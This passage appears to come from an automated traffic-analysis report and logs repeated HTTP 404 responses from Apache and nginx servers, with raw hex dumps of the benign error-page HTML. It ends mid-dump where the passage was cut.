                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:33:39 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:33:42 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:33:44 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:33:47 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TuserDate: Wed, 20 Nov 2024 07:33:54 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TuserDate: Wed, 20 Nov 2024 07:33:57 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TuserDate: Wed, 20 Nov 2024 07:33:59 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TuserDate: Wed, 20 Nov 2024 07:34:02 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 